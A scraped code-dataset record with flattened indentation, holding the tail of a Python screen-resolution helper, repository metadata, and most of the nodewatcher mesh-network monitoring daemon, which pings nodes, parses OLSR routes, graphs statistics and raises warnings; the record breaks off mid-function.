# http://www.cyberciti.biz/faq/how-do-i-find-out-screen-resolution-of-my-linux-desktop/
# xdpyinfo | grep 'dimensions:'
screen_width, screen_height = 0, 0
if not os.environ.get("DISPLAY"):
raise ValueError("missing DISPLAY variable")
xdpyinfo = EasyProcess("xdpyinfo")
xdpyinfo.enable_stdout_log = False
if xdpyinfo.call().return_code != 0:
raise ValueError("xdpyinfo error: %s" % xdpyinfo)
for x in xdpyinfo.stdout.splitlines():
if "dimensions:" in x:
screen_width, screen_height = map(int, x.strip().split()[1].split("x"))
return screen_width, screen_height
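# Illustrative xdpyinfo line parsed above (exact output varies by system):
#   dimensions:    1920x1080 pixels (508x285 millimeters)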
def display_size_osx():
from Quartz import CGDisplayBounds
from Quartz import CGMainDisplayID
mainMonitor = CGDisplayBounds(CGMainDisplayID())
return int(mainMonitor.size.width), int(mainMonitor.size.height)
def display_size_win():
from win32api import GetSystemMetrics
return int(GetSystemMetrics(0)), int(GetSystemMetrics(1))
def display_size():
if platform_is_osx():
return display_size_osx()
if platform_is_win():
return display_size_win()
if platform_is_linux():
return display_size_x()
|
bsd-2-clause
| 3,261,601,400,750,375,400
| 27.723404
| 91
| 0.684444
| false
| 3.443878
| false
| false
| false
|
galaxor/Nodewatcher
|
nodewatcher/monitor/monitor.py
|
1
|
45662
|
#!/usr/bin/python
#
# nodewatcher monitoring daemon
#
# Copyright (C) 2009 by Jernej Kos <kostko@unimatrix-one.org>
#
# First parse options (this must be done here since they contain import paths
# that must be parsed before Django models can be imported)
import sys, os
from optparse import OptionParser
print "============================================================================"
print " nodewatcher monitoring daemon "
print "============================================================================"
parser = OptionParser()
parser.add_option('--path', dest = 'path', help = 'Path that contains nodewatcher "web" Python module')
parser.add_option('--settings', dest = 'settings', help = 'Django settings to use')
parser.add_option('--olsr-host', dest = 'olsr_host', help = 'A host with OLSR txt-info plugin running (overrides settings file)')
parser.add_option('--stress-test', dest = 'stress_test', help = 'Perform a stress test (only used for development)', action = 'store_true')
parser.add_option('--collect-simulation', dest = 'collect_sim', help = 'Collect simulation data', action = 'store_true')
parser.add_option('--update-rrds', dest = 'update_rrds', help = 'Update RRDs', action = 'store_true')
parser.add_option('--update-rrd-type', dest = 'update_rrd_type', help = 'Update RRD type (refresh, archive, switch_sources)', default = 'refresh')
parser.add_option('--update-rrd-opts', dest = 'update_rrd_opts', help = 'Update RRD options', default = '')
parser.add_option('--reverse-populate', dest = 'reverse_populate', help = 'Reverse populate RRD with data from a database', action = 'store_true')
parser.add_option('--reverse-populate-node', dest = 'rp_node', help = 'Node to populate data for')
parser.add_option('--reverse-populate-graph', dest = 'rp_graph', help = 'Graph type to populate data for')
options, args = parser.parse_args()
if not options.path:
print "ERROR: Path specification is required!\n"
parser.print_help()
exit(1)
elif not options.settings:
print "ERROR: Settings specification is required!\n"
parser.print_help()
exit(1)
elif options.reverse_populate and (not options.rp_node or not options.rp_graph):
print "ERROR: Reverse populate requires node and graph type!\n"
parser.print_help()
exit(1)
# Setup import paths, since we are using Django models
sys.path.append(options.path)
os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
# Import our models
from web.nodes.models import Node, NodeStatus, Subnet, SubnetStatus, APClient, Link, GraphType, GraphItem, Event, EventSource, EventCode, IfaceType, InstalledPackage, NodeType, RenumberNotice, WarningCode, NodeWarning, Tweet
from web.generator.models import Template, Profile
from web.nodes import data_archive
from django.db import transaction, models, connection
from django.conf import settings
# Possibly override MONITOR_OLSR_HOST setting with command line option
if options.olsr_host:
settings.MONITOR_OLSR_HOST = options.olsr_host
# Import other stuff
if getattr(settings, 'MONITOR_ENABLE_SIMULATION', None) or options.stress_test:
from simulator import nodewatcher, wifi_utils
else:
from lib import nodewatcher, wifi_utils
# Setup simulation data collection
nodewatcher.COLLECT_SIMULATION_DATA = options.collect_sim
wifi_utils.COLLECT_SIMULATION_DATA = options.collect_sim
from web.monitor.rrd import *
from web.monitor import graphs
from lib.topology import DotTopologyPlotter
from lib import ipcalc
from time import sleep
from datetime import datetime, timedelta
from traceback import format_exc, print_exc
import pwd
import logging
import time
import multiprocessing
import gc
import struct
if Tweet.tweets_enabled():
from lib import bitly
WORKER_POOL = None
def safe_int_convert(integer):
"""
A helper method for converting a string to an integer.
"""
try:
return int(integer)
except:
return None
def safe_float_convert(value, precision = 3):
"""
A helper method for converting a string to a float.
"""
try:
return round(float(value), precision)
except:
return None
def safe_loadavg_convert(loadavg):
"""
A helper method for converting a string to a loadavg tuple.
"""
try:
loadavg = loadavg.split(' ')
la1min, la5min, la15min = (float(x) for x in loadavg[0:3])
nproc = int(loadavg[3].split('/')[1])
return la1min, la5min, la15min, nproc
except:
return None, None, None, None
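# Illustrative example, assuming /proc/loadavg-style input:
#   safe_loadavg_convert("0.15 0.10 0.05 2/123 4567") -> (0.15, 0.1, 0.05, 123)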
def safe_uptime_convert(uptime):
"""
A helper method for converting a string to an uptime integer.
"""
try:
return int(float(uptime.split(' ')[0]))
except:
return None
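# Illustrative example, assuming /proc/uptime-style input:
#   safe_uptime_convert("12345.67 23456.78") -> 12345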
def safe_date_convert(timestamp):
"""
A helper method for converting a string timestamp into a datetime
object.
"""
try:
return datetime.fromtimestamp(int(timestamp))
except:
return None
def safe_dbm_convert(dbm):
"""
A helper method for converting a string into a valid dBm integer
value. This also takes care of unsigned/signed char conversions.
"""
try:
dbm = safe_int_convert(dbm)
if dbm is None:
return None
if dbm > 127:
# Convert from unsigned char into signed one
dbm = struct.unpack("b", struct.pack("<i", dbm)[0])[0]
return dbm
except:
return None
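# Illustrative examples: values reported as unsigned chars are reinterpreted as signed bytes,
#   e.g. safe_dbm_convert("200") -> -56, safe_dbm_convert("-70") -> -70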
@transaction.commit_on_success
def check_events():
"""
Check events that need resend.
"""
transaction.set_dirty()
Event.post_events_that_need_resend()
@transaction.commit_on_success
def check_global_statistics():
"""
Graph some global statistics.
"""
transaction.set_dirty()
# Nodes by status
nbs = {}
for s in Node.objects.exclude(node_type = NodeType.Test).values('status').annotate(count = models.Count('ip')):
nbs[s['status']] = s['count']
rra = os.path.join(settings.MONITOR_WORKDIR, 'rra', 'global_nodes_by_status.rrd')
RRA.update(None, RRANodesByStatus, rra,
nbs.get(NodeStatus.Up, 0),
nbs.get(NodeStatus.Down, 0),
nbs.get(NodeStatus.Visible, 0),
nbs.get(NodeStatus.Invalid, 0),
nbs.get(NodeStatus.Pending, 0),
nbs.get(NodeStatus.Duped, 0),
graph = -2
)
# Global client count
client_count = len(APClient.objects.all())
rra = os.path.join(settings.MONITOR_WORKDIR, 'rra', 'global_client_count.rrd')
RRA.update(None, RRAGlobalClients, rra, client_count, graph = -3)
def update_rrd(item):
"""
Updates a single RRD.
"""
archive = str(os.path.join(settings.MONITOR_WORKDIR, 'rra', item.rra))
conf = graphs.RRA_CONF_MAP[item.type]
# Update the RRD
RRA.convert(conf, archive, action = options.update_rrd_type, opts = options.update_rrd_opts, graph = item.pk)
def update_rrds():
"""
Updates RRDs.
"""
# We must close the database connection before we fork the worker pool, otherwise
# resources will be shared and problems will arise!
connection.close()
pool = multiprocessing.Pool(processes = settings.MONITOR_GRAPH_WORKERS)
try:
pool.map(update_rrd, GraphItem.objects.all()[:])
# Don't forget the global graphs
rra_status = os.path.join(settings.MONITOR_WORKDIR, 'rra', 'global_nodes_by_status.rrd')
rra_clients = os.path.join(settings.MONITOR_WORKDIR, 'rra', 'global_client_count.rrd')
RRA.convert(RRANodesByStatus, rra_status, action = options.update_rrd_type, graph = -2)
RRA.convert(RRAGlobalClients, rra_clients, action = options.update_rrd_type, graph = -3)
except:
logging.warning(format_exc())
pool.close()
pool.join()
@transaction.commit_on_success
def check_dead_graphs():
"""
Checks for dead graphs.
"""
GraphItem.objects.filter(dead = False, last_update__lt = datetime.now() - timedelta(minutes = 10)).update(
dead = True,
need_redraw = True
)
# Remove RRDs that need removal
for graph in GraphItem.objects.filter(need_removal = True):
try:
os.unlink(os.path.join(settings.MONITOR_WORKDIR, 'rra', graph.rra))
except:
pass
GraphItem.objects.filter(need_removal = True).delete()
def generate_new_node_tweet(node):
"""
Generates a tweet when a new node connects to the network.
"""
if not Tweet.tweets_enabled():
return
try:
bit_api = bitly.Api(login=settings.BITLY_LOGIN, apikey=settings.BITLY_API_KEY)
node_link = bit_api.shorten(node.get_full_url())
msg = "A new node %s has just connected to the network %s" % (node.name, node_link)
Tweet.post_tweet(node, msg)
except:
logging.warning("%s/%s: %s" % (node.name, node.ip, format_exc()))
@transaction.commit_on_success
def process_node(node_ip, ping_results, is_duped, peers, varsize_results):
"""
Processes a single node.
@param node_ip: Node's IP address
@param ping_results: Results obtained from ICMP ECHO tests
@param is_duped: True if duplicate echos received
@param peers: Peering info from routing daemon
@param varsize_results: Results of ICMP ECHO tests with variable payloads
"""
transaction.set_dirty()
try:
n = Node.get_exclusive(ip = node_ip)
except Node.DoesNotExist:
# This might happen when we were in the middle of a renumbering and
# did not yet have access to the node. Then after the node has been
# renumbered we gain access, but the IP has been changed. In this
# case we must ignore processing of this node.
return
grapher = graphs.Grapher(n)
oldStatus = n.status
old_last_seen = n.last_seen
# Determine node status
if ping_results is not None:
n.status = NodeStatus.Up
n.rtt_min, n.rtt_avg, n.rtt_max, n.pkt_loss = ping_results
# Add RTT graph
grapher.add_graph(GraphType.RTT, 'Latency', 'latency', n.rtt_avg, n.rtt_min, n.rtt_max)
# Add uptime credit
if n.uptime_last:
n.uptime_so_far = (n.uptime_so_far or 0) + (datetime.now() - n.uptime_last).seconds
n.uptime_last = datetime.now()
else:
n.status = NodeStatus.Visible
# Measure packet loss with different packet sizes and generate a graph
if ping_results is not None and varsize_results is not None:
losses = [n.pkt_loss] + varsize_results
grapher.add_graph(GraphType.PacketLoss, 'Packet Loss', 'packetloss', *losses)
if is_duped:
n.status = NodeStatus.Duped
NodeWarning.create(n, WarningCode.DupedReplies, EventSource.Monitor)
# Generate status change events
if oldStatus in (NodeStatus.Down, NodeStatus.Pending, NodeStatus.New) and n.status in (NodeStatus.Up, NodeStatus.Visible):
if oldStatus in (NodeStatus.New, NodeStatus.Pending):
n.first_seen = datetime.now()
if n.node_type == NodeType.Wireless:
generate_new_node_tweet(n)
Event.create_event(n, EventCode.NodeUp, '', EventSource.Monitor)
elif oldStatus != NodeStatus.Duped and n.status == NodeStatus.Duped:
Event.create_event(n, EventCode.PacketDuplication, '', EventSource.Monitor)
# Add olsr peer count graph
grapher.add_graph(GraphType.OlsrPeers, 'Routing Peers', 'olsrpeers', n.peers)
# Add LQ/ILQ/ETX graphs
if n.peers > 0:
etx_avg = lq_avg = ilq_avg = 0.0
for peer in n.get_peers():
lq_avg += float(peer.lq)
ilq_avg += float(peer.ilq)
etx_avg += float(peer.etx)
lq_graph = grapher.add_graph(GraphType.LQ, 'Average Link Quality', 'lq', ilq_avg / n.peers, lq_avg / n.peers)
etx_graph = grapher.add_graph(GraphType.ETX, 'Average ETX', 'etx', etx_avg / n.peers)
for peer in n.get_peers():
# Link quality
grapher.add_graph(
GraphType.LQ,
'Link Quality to {0}'.format(peer.dst),
'lq_peer_{0}'.format(peer.dst.pk),
peer.ilq,
peer.lq,
name = peer.dst.ip,
parent = lq_graph
)
# ETX
grapher.add_graph(
GraphType.ETX,
'ETX to {0}'.format(peer.dst),
'etx_peer_{0}'.format(peer.dst.pk),
peer.etx,
name = peer.dst.ip,
parent = etx_graph
)
n.last_seen = datetime.now()
# Attempt to fetch data from nodewatcher
info = nodewatcher.fetch_node_info(node_ip)
# XXX This is an ugly hack for server-type nodes, but it will be fixed by modularization
# rewrite anyway, so no need to make it nice
if n.node_type == NodeType.Server and info is not None and 'iface' in info:
try:
# Record interface traffic statistics for all interfaces
for iid, iface in info['iface'].iteritems():
grapher.add_graph(
GraphType.Traffic,
'Traffic - {0}'.format(iid),
'traffic_{0}'.format(iid),
iface['up'],
iface['down'],
name = iid
)
except:
pass
info = None
# Check if we have fetched nodewatcher data
if info is not None and 'general' in info:
try:
oldUptime = n.uptime or 0
oldChannel = n.channel or 0
oldVersion = n.firmware_version
n.firmware_version = info['general']['version']
n.local_time = safe_date_convert(info['general']['local_time'])
n.bssid = info['wifi']['bssid']
n.essid = info['wifi']['essid']
n.channel = nodewatcher.frequency_to_channel(info['wifi']['frequency'])
n.clients = 0
n.uptime = safe_uptime_convert(info['general']['uptime'])
# Treat missing firmware version file as NULL version
if n.firmware_version == "missing":
n.firmware_version = None
# Validate BSSID and ESSID
if n.bssid != "02:CA:FF:EE:BA:BE":
NodeWarning.create(n, WarningCode.BSSIDMismatch, EventSource.Monitor)
try:
if n.essid != n.configured_essid:
NodeWarning.create(n, WarningCode.ESSIDMismatch, EventSource.Monitor)
except Project.DoesNotExist:
pass
if 'uuid' in info['general']:
n.reported_uuid = info['general']['uuid']
if n.reported_uuid and n.reported_uuid != n.uuid:
NodeWarning.create(n, WarningCode.MismatchedUuid, EventSource.Monitor)
if oldVersion != n.firmware_version:
Event.create_event(n, EventCode.VersionChange, '', EventSource.Monitor, data = 'Old version: %s\n New version: %s' % (oldVersion, n.firmware_version))
if oldUptime > n.uptime:
Event.create_event(n, EventCode.UptimeReset, '', EventSource.Monitor, data = 'Old uptime: %s\n New uptime: %s' % (oldUptime, n.uptime))
# Setup reboot mode for further graphs as we now know the node has
# been rebooted
grapher.enable_reboot_mode(n.uptime, old_last_seen)
if oldChannel != n.channel and oldChannel != 0:
Event.create_event(n, EventCode.ChannelChanged, '', EventSource.Monitor, data = 'Old channel: %s\n New channel %s' % (oldChannel, n.channel))
try:
if n.channel != n.profile.channel:
NodeWarning.create(n, WarningCode.ChannelMismatch, EventSource.Monitor)
except Profile.DoesNotExist:
pass
if n.has_time_sync_problems():
NodeWarning.create(n, WarningCode.TimeOutOfSync, EventSource.Monitor)
if 'errors' in info['wifi']:
error_count = safe_int_convert(info['wifi']['errors'])
if error_count != n.wifi_error_count and error_count > 0:
Event.create_event(n, EventCode.WifiErrors, '', EventSource.Monitor, data = 'Old count: %s\n New count: %s' % (n.wifi_error_count, error_count))
n.wifi_error_count = error_count
if 'net' in info:
loss_count = safe_int_convert(info['net']['losses']) if 'losses' in info['net'] else 0
if loss_count != n.loss_count and loss_count > 1:
Event.create_event(n, EventCode.ConnectivityLoss, '', EventSource.Monitor, data = 'Old count: %s\n New count: %s' % (n.loss_count, loss_count))
n.loss_count = loss_count
# Check VPN configuration
if 'vpn' in info['net']:
n.vpn_mac = info['net']['vpn']['mac'] or None
try:
offset = -3
unit = 1000
if 'Kbit' in info['net']['vpn']['upload_limit']:
offset = -4
unit = 1
upload_limit = safe_int_convert(info['net']['vpn']['upload_limit'][:offset]) // unit
except TypeError:
upload_limit = None
if n.vpn_mac and n.vpn_mac != n.vpn_mac_conf:
NodeWarning.create(n, WarningCode.VPNMacMismatch, EventSource.Monitor)
try:
if upload_limit != n.profile.vpn_egress_limit:
NodeWarning.create(n, WarningCode.VPNLimitMismatch, EventSource.Monitor)
except Profile.DoesNotExist:
pass
# Parse nodogsplash client information
oldNdsStatus = n.captive_portal_status
if 'nds' in info:
if 'down' in info['nds'] and info['nds']['down'] == '1':
n.captive_portal_status = False
# Create a node warning when captive portal is down and the node has it
# selected in its image generator profile
try:
if n.project.captive_portal and n.has_client_subnet():
NodeWarning.create(n, WarningCode.CaptivePortalDown, EventSource.Monitor)
except Profile.DoesNotExist:
pass
else:
n.captive_portal_status = True
for cid, client in info['nds'].iteritems():
if not cid.startswith('client'):
continue
try:
c = APClient.objects.get(node = n, ip = client['ip'])
except APClient.DoesNotExist:
c = APClient(node = n)
n.clients_so_far += 1
n.clients += 1
c.ip = client['ip']
c.connected_at = safe_date_convert(client['added_at'])
c.uploaded = safe_int_convert(client['up'])
c.downloaded = safe_int_convert(client['down'])
c.last_update = datetime.now()
c.save()
else:
n.captive_portal_status = True
# Check for captive portal status change
if n.has_client_subnet():
if oldNdsStatus and not n.captive_portal_status:
Event.create_event(n, EventCode.CaptivePortalDown, '', EventSource.Monitor)
elif not oldNdsStatus and n.captive_portal_status:
Event.create_event(n, EventCode.CaptivePortalUp, '', EventSource.Monitor)
# Generate a graph for number of wifi cells
if 'cells' in info['wifi']:
grapher.add_graph(GraphType.WifiCells, 'Nearby WiFi Cells', 'wificells', safe_int_convert(info['wifi']['cells']) or 0)
# Update node's MAC address on wifi iface
if 'mac' in info['wifi']:
n.wifi_mac = info['wifi']['mac']
# Update node's RTS and fragmentation thresholds
if 'rts' in info['wifi'] and 'frag' in info['wifi']:
n.thresh_rts = safe_int_convert(info['wifi']['rts']) or 2347
n.thresh_frag = safe_int_convert(info['wifi']['frag']) or 2347
# Check node's multicast rate
if 'mcast_rate' in info['wifi']:
rate = safe_int_convert(info['wifi']['mcast_rate'])
if rate != 5500:
NodeWarning.create(n, WarningCode.McastRateMismatch, EventSource.Monitor)
# Check node's wifi bitrate, level and noise
if 'signal' in info['wifi']:
bitrate = safe_int_convert(info['wifi']['bitrate'])
signal = safe_dbm_convert(info['wifi']['signal'])
noise = safe_dbm_convert(info['wifi']['noise'])
snr = float(signal) - float(noise)
grapher.add_graph(GraphType.WifiBitrate, 'WiFi Bitrate', 'wifibitrate', bitrate)
grapher.add_graph(GraphType.WifiSignalNoise, 'WiFi Signal/Noise', 'wifisignalnoise', signal, noise)
grapher.add_graph(GraphType.WifiSNR, 'WiFi Signal/Noise Ratio', 'wifisnr', snr)
# Check for IP shortage
wifi_subnet = n.subnet_set.filter(gen_iface_type = IfaceType.WiFi, allocated = True)
if wifi_subnet and n.clients > max(0, ipcalc.Network(wifi_subnet[0].subnet, wifi_subnet[0].cidr).size() - 4):
Event.create_event(n, EventCode.IPShortage, '', EventSource.Monitor, data = 'Subnet: %s\n Clients: %s' % (wifi_subnet[0], n.clients))
NodeWarning.create(n, WarningCode.IPShortage, EventSource.Monitor)
# Fetch DHCP leases when available
lease_count = 0
if 'dhcp' in info:
per_subnet_counts = {}
for cid, client in info['dhcp'].iteritems():
if not cid.startswith('client'):
continue
# Determine which subnet this thing belongs to
client_subnet = n.subnet_set.ip_filter(ip_subnet__contains = client['ip'])
if client_subnet:
client_subnet = client_subnet[0]
per_subnet_counts[client_subnet] = per_subnet_counts.get(client_subnet, 0) + 1
else:
# TODO Subnet is not announced by this node - potential problem, but ignore for now
pass
lease_count += 1
# Check for IP shortage
for client_subnet, count in per_subnet_counts.iteritems():
if count > ipcalc.Network(client_subnet.subnet, client_subnet.cidr).size() - 4:
            Event.create_event(n, EventCode.IPShortage, '', EventSource.Monitor, data = 'Subnet: {0}\n  Leases: {1}'.format(client_subnet, count))
NodeWarning.create(n, WarningCode.IPShortage, EventSource.Monitor)
# Generate a graph for number of clients
if 'nds' in info or lease_count > 0:
grapher.add_graph(GraphType.Clients, 'Connected Clients', 'clients', n.clients, lease_count)
# Record interface traffic statistics for all interfaces
for iid, iface in info['iface'].iteritems():
if iid not in ('wifi0', 'wmaster0'):
# Check mappings for known wifi interfaces so we can handle hardware changes while
# the node is up and not generate useless intermediate graphs
try:
if n.profile:
iface_wifi = n.profile.template.iface_wifi
if Template.objects.filter(iface_wifi = iid).count() >= 1:
iid = iface_wifi
except Profile.DoesNotExist:
pass
grapher.add_graph(GraphType.Traffic, 'Traffic - %s' % iid, 'traffic_%s' % iid, iface['up'], iface['down'], name = iid)
# Generate load average statistics
if 'loadavg' in info['general']:
n.loadavg_1min, n.loadavg_5min, n.loadavg_15min, n.numproc = safe_loadavg_convert(info['general']['loadavg'])
grapher.add_graph(GraphType.LoadAverage, 'Load Average', 'loadavg', n.loadavg_1min, n.loadavg_5min, n.loadavg_15min)
grapher.add_graph(GraphType.NumProc, 'Number of Processes', 'numproc', n.numproc)
# Generate free memory statistics
if 'memfree' in info['general']:
n.memfree = safe_int_convert(info['general']['memfree'])
buffers = safe_int_convert(info['general'].get('buffers', 0))
cached = safe_int_convert(info['general'].get('cached', 0))
grapher.add_graph(GraphType.MemUsage, 'Memory Usage', 'memusage', n.memfree, buffers, cached)
# Generate solar statistics when available
if 'solar' in info and all([x in info['solar'] for x in ('batvoltage', 'solvoltage', 'charge', 'state', 'load')]):
states = {
'boost' : 1,
'equalize' : 2,
'absorption' : 3,
'float' : 4
}
for key, value in info['solar'].iteritems():
if not value.strip():
info['solar'][key] = None
grapher.add_graph(GraphType.Solar, 'Solar Monitor', 'solar',
info['solar']['batvoltage'],
info['solar']['solvoltage'],
info['solar']['charge'],
states.get(info['solar']['state']),
info['solar']['load']
)
# Generate statistics for environmental data
if 'environment' in info:
for key, value in info['environment'].iteritems():
if not key.startswith('sensor'):
continue
if 'temp' in value:
temp = safe_float_convert(value['temp'])
serial = value['serial']
grapher.add_graph(GraphType.Temperature, 'Temperature ({0})'.format(serial), 'temp_{0}'.format(serial), temp, name = serial)
# XXX UGLY HACK: Some random voltage reports
if 'voltage' in info:
serial = info['voltage']['serial']
voltages = [safe_float_convert(info['voltage'][x].strip()) for x in '1234']
multipliers = [safe_int_convert(info['voltage']['%sm' % x].strip()) for x in '1234']
results = []
for voltage, multiplier in zip(voltages, multipliers):
if voltage is not None:
results.append(voltage * multiplier)
else:
results.append(None)
grapher.add_graph(GraphType.Voltage, 'Voltage ({0})'.format(serial), 'volt_{0}'.format(serial), *results, name = serial)
# Check for installed package versions (every hour)
try:
last_pkg_update = n.installedpackage_set.all()[0].last_update
except:
last_pkg_update = None
if not last_pkg_update or last_pkg_update < datetime.now() - timedelta(hours = 1):
packages = nodewatcher.fetch_installed_packages(n.ip) or {}
# Remove removed packages and update existing package versions
for package in n.installedpackage_set.all():
if package.name not in packages:
package.delete()
else:
package.version = packages[package.name]
package.last_update = datetime.now()
package.save()
del packages[package.name]
# Add added packages
for packageName, version in packages.iteritems():
package = InstalledPackage(node = n)
package.name = packageName
package.version = version
package.last_update = datetime.now()
package.save()
# Check if all selected optional packages are present in package listing
try:
missing_packages = []
for package in n.profile.optional_packages.all():
for pname in package.name.split():
if n.installedpackage_set.filter(name = pname).count() == 0:
missing_packages.append(pname)
if missing_packages:
NodeWarning.create(n, WarningCode.OptPackageNotFound, EventSource.Monitor, details = ("Packages missing: %s" % ", ".join(missing_packages)))
except Profile.DoesNotExist:
pass
# Check if DNS works
if 'dns' in info:
old_dns_works = n.dns_works
n.dns_works = info['dns']['local'] == '0' and info['dns']['remote'] == '0'
if not n.dns_works:
NodeWarning.create(n, WarningCode.DnsDown, EventSource.Monitor)
if old_dns_works != n.dns_works:
# Generate a proper event when the state changes
if n.dns_works:
Event.create_event(n, EventCode.DnsResolverRestored, '', EventSource.Monitor)
else:
Event.create_event(n, EventCode.DnsResolverFailed, '', EventSource.Monitor)
except:
logging.warning("Failed to interpret nodewatcher data for node '%s (%s)'!" % (n.name, n.ip))
logging.warning(format_exc())
NodeWarning.create(n, WarningCode.NodewatcherInterpretFailed, EventSource.Monitor)
n.save()
# When GC debugging is enabled perform some more work
if getattr(settings, 'MONITOR_ENABLE_GC_DEBUG', None):
gc.collect()
return os.getpid(), len(gc.get_objects())
return None, None
@transaction.commit_on_success
def check_network_status():
"""
Performs the network status check.
"""
# Initialize the state of nodes and subnets, remove out of date ap clients and graph items
Node.objects.all().update(visible = False)
Subnet.objects.all().update(visible = False)
Link.objects.all().update(visible = False)
APClient.objects.filter(last_update__lt = datetime.now() - timedelta(minutes = 11)).delete()
# Reset some states
NodeWarning.objects.all().update(source = EventSource.Monitor, dirty = False)
Node.objects.all().update(warnings = False, conflicting_subnets = False)
# Fetch routing tables from OLSR
try:
nodes, hna = wifi_utils.get_tables(settings.MONITOR_OLSR_HOST)
except TypeError:
logging.error("Unable to fetch routing tables from '%s'!" % settings.MONITOR_OLSR_HOST)
return
# Ping nodes present in the database and visible in OLSR
dbNodes = {}
nodesToPing = []
for nodeIp in nodes.keys():
try:
# Try to get the node from the database
n = Node.get_exclusive(ip = nodeIp)
n.visible = True
n.peers = len(nodes[nodeIp].links)
# If we have succeeded, add to list (if not invalid)
if not n.is_invalid():
if n.awaiting_renumber:
# Reset any status from awaiting renumber to invalid
for notice in n.renumber_notices.all():
try:
rn = Node.objects.get(ip = notice.original_ip)
if rn.status == NodeStatus.AwaitingRenumber:
rn.status = NodeStatus.Invalid
rn.node_type = NodeType.Unknown
rn.awaiting_renumber = False
rn.save()
except Node.DoesNotExist:
pass
notice.delete()
n.awaiting_renumber = False
n.save()
nodesToPing.append(nodeIp)
else:
n.last_seen = datetime.now()
n.peers = len(nodes[nodeIp].links)
# Create a warning since node is not registered
NodeWarning.create(n, WarningCode.UnregisteredNode, EventSource.Monitor)
n.save()
dbNodes[nodeIp] = n
except Node.DoesNotExist:
# Node does not exist, create an invalid entry for it
n = Node(ip = nodeIp, status = NodeStatus.Invalid, last_seen = datetime.now())
n.visible = True
n.node_type = NodeType.Unknown
n.peers = len(nodes[nodeIp].links)
# Check if there are any renumber notices for this IP address
try:
notice = RenumberNotice.objects.get(original_ip = nodeIp)
n.status = NodeStatus.AwaitingRenumber
n.node_type = notice.node.node_type
n.awaiting_renumber = True
except RenumberNotice.DoesNotExist:
pass
n.save(force_insert = True)
dbNodes[nodeIp] = n
# Create an event and append a warning since an unknown node has appeared
NodeWarning.create(n, WarningCode.UnregisteredNode, EventSource.Monitor)
Event.create_event(n, EventCode.UnknownNodeAppeared, '', EventSource.Monitor)
# Add a warning to all nodes that have been stuck in renumbering state for over a week
for node in Node.objects.filter(renumber_notices__renumbered_at__lt = datetime.now() - timedelta(days = 7)):
NodeWarning.create(node, WarningCode.LongRenumber, EventSource.Monitor)
node.save()
# Mark invisible nodes as down
for node in Node.objects.exclude(status__in = (NodeStatus.Invalid, NodeStatus.AwaitingRenumber)):
oldStatus = node.status
if node.ip not in dbNodes:
if node.status == NodeStatus.New:
node.status = NodeStatus.Pending
elif node.status != NodeStatus.Pending:
node.status = NodeStatus.Down
node.save()
if oldStatus in (NodeStatus.Up, NodeStatus.Visible, NodeStatus.Duped) and node.status == NodeStatus.Down:
Event.create_event(node, EventCode.NodeDown, '', EventSource.Monitor)
# Invalidate uptime credit for this node
node.uptime_last = None
node.save()
# Generate timestamp and snapshot identifier
timestamp = datetime.now()
snapshot_id = int(time.time())
# Setup all node peerings
for nodeIp, node in nodes.iteritems():
n = dbNodes[nodeIp]
n.redundancy_link = False
links = []
# Find old VPN server peers
old_vpn_peers = set([p.dst for p in n.get_peers().filter(dst__vpn_server = True)])
for peerIp, lq, ilq, etx, vtime in node.links:
try:
l = Link.objects.get(src = n, dst = dbNodes[peerIp])
except Link.DoesNotExist:
l = Link(src = n, dst = dbNodes[peerIp])
l.lq = float(lq)
l.ilq = float(ilq)
l.etx = float(etx)
l.vtime = vtime
l.visible = True
l.save()
links.append(l)
# Check if any of the peers has never peered with us before
if n.is_adjacency_important() and l.dst.is_adjacency_important() and not n.peer_history.filter(pk = l.dst.pk).count():
n.peer_history.add(l.dst)
Event.create_event(n, EventCode.AdjacencyEstablished, '', EventSource.Monitor,
data = 'Peer node: %s' % l.dst, aggregate = False)
Event.create_event(l.dst, EventCode.AdjacencyEstablished, '', EventSource.Monitor,
data = 'Peer node: %s' % n, aggregate = False)
# Check if we have a peering with any VPN servers
if l.dst.vpn_server:
n.redundancy_link = True
if not n.is_invalid():
# Determine new VPN server peers
new_vpn_peers = set([p.dst for p in n.get_peers().filter(visible = True, dst__vpn_server = True)])
if old_vpn_peers != new_vpn_peers:
for p in old_vpn_peers:
if p not in new_vpn_peers:
            # Redundancy loss has occurred
Event.create_event(n, EventCode.RedundancyLoss, '', EventSource.Monitor,
data = 'VPN server: %s' % p)
for p in new_vpn_peers:
if p not in old_vpn_peers:
            # Redundancy restoration has occurred
Event.create_event(n, EventCode.RedundancyRestored, '', EventSource.Monitor,
data = 'VPN server: %s' % p)
# Issue a warning when node requires peering but has none
if n.redundancy_req and not n.redundancy_link:
NodeWarning.create(n, WarningCode.NoRedundancy, EventSource.Monitor)
n.save()
# Archive topology information
data_archive.record_topology_entry(snapshot_id, timestamp, n, links)
# Update valid subnet status in the database
for nodeIp, subnets in hna.iteritems():
if nodeIp not in dbNodes:
continue
for subnet in subnets:
subnet, cidr = subnet.split("/")
try:
s = Subnet.objects.get(node__ip = nodeIp, subnet = subnet, cidr = int(cidr))
s.last_seen = datetime.now()
s.visible = True
except Subnet.DoesNotExist:
s = Subnet(node = dbNodes[nodeIp], subnet = subnet, cidr = int(cidr), last_seen = datetime.now())
s.visible = True
s.allocated = False
# Save previous subnet status for later use
old_status = s.status
      # Set status according to the allocation flag
if s.allocated:
s.status = SubnetStatus.AnnouncedOk
else:
s.status = SubnetStatus.NotAllocated
# Check if this is a more specific prefix announce for an allocated prefix
if s.is_more_specific() and not s.allocated:
s.status = SubnetStatus.Subset
# Check if this is a hijack
try:
origin = Subnet.objects.ip_filter(
# Subnet overlaps with another one
ip_subnet__contains = '%s/%s' % (subnet, cidr)
).exclude(
# Of another node (= filter all subnets belonging to current node)
node = s.node
).get(
# That is allocated and visible
allocated = True,
visible = True
)
s.status = SubnetStatus.Hijacked
except Subnet.DoesNotExist:
pass
# Generate an event if status has changed
if old_status != s.status and s.status == SubnetStatus.Hijacked:
Event.create_event(n, EventCode.SubnetHijacked, '', EventSource.Monitor,
data = 'Subnet: %s/%s\n Allocated to: %s' % (s.subnet, s.cidr, origin.node))
# Flag node entry with warnings flag for unregistered announces
if not s.is_properly_announced():
if s.node.border_router and not s.is_from_known_pool():
# TODO when we have peering announce registration this should first check if
# the subnet is registered as a peering
s.status = SubnetStatus.Peering
if not s.node.border_router or s.status == SubnetStatus.Hijacked or s.is_from_known_pool():
# Add a warning message for unregistered announced subnets
NodeWarning.create(s.node, WarningCode.UnregisteredAnnounce, EventSource.Monitor)
s.node.save()
s.save()
# Detect subnets that cause conflicts and raise warning flags for all involved
# nodes
if s.is_conflicting():
